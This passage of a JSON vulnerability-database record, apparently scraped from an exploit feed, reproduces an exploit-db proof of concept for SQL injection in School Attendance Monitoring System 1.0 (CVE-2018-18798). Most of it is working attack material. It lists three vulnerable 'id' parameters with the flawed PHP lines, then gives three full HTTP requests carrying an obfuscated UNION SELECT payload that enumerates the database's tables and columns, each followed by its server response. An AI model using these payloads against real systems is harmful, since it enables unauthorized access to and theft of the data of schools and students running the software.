GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45727"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:47", "description": "\nSchool Attendance Monitoring System 1.0 - SQL Injection", "edition": 1, "published": "2018-10-29T00:00:00", "title": "School Attendance Monitoring System 1.0 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18798"], "modified": "2018-10-29T00:00:00", "id": "EXPLOITPACK:295868DCF7E82260F77E91018F176617", "href": "", "sourceData": "# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection\n# Dork: N/A\n# Date: 2018-10-29\n# Exploit Author: Ihsan Sencan\n# Vendor Homepage: https://www.sourcecodester.com/users/janobe\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip\n# Version: 1.0\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-18798\n\n# POC: \n# 1)\n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]\n# \n#[PATH]/student/view.php\n#01 <?php \n#02 $student = New Student();\n#03 $res = $student->select_student($_GET['id']);\n#04 \n#05 \n#06 $course = New Course();\n#07 $resCourse = $course->single_course($res->CourseID);\n#08 \n#09 ?>\nGET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1\nHost: TARGET\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\nConnection: keep-alive\nHTTP/1.1 200 OK\nDate: Sun, 28 Oct 2018 19:37:01 GMT\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\nX-Powered-By: PHP/5.6.30\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8\n\n# POC: \n# 2)\n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]\n# \n#[PATH]/event/view.php\n#01 <?php \n#02 $event = New Event();\n#03 $res = $event->single_event($_GET['id']);\n#04 \n#05 \n#06 \n#07 ?>\nGET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\nHost: TARGET\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\nConnection: keep-alive\nHTTP/1.1 200 OK\nDate: Sun, 28 Oct 2018 17:12:15 GMT\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\nX-Powered-By: PHP/5.6.30\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8\n\n# POC: \n# 3)\n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]\n# \n#[PATH]/user/view.php\n#01 <?php \n#02 $user = New User();\n#03 $res = $user->single_user($_GET['id']);\n#04 \n#05 \n#06 \n#07 ?>\nGET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\nHost: TARGET\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\nConnection: keep-alive\nHTTP/1.1 200 OK\nDate: Sun, 28 Oct 2018 17:16:52 GMT\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\nX-Powered-By: PHP/5.6.30\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=UTF-8", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
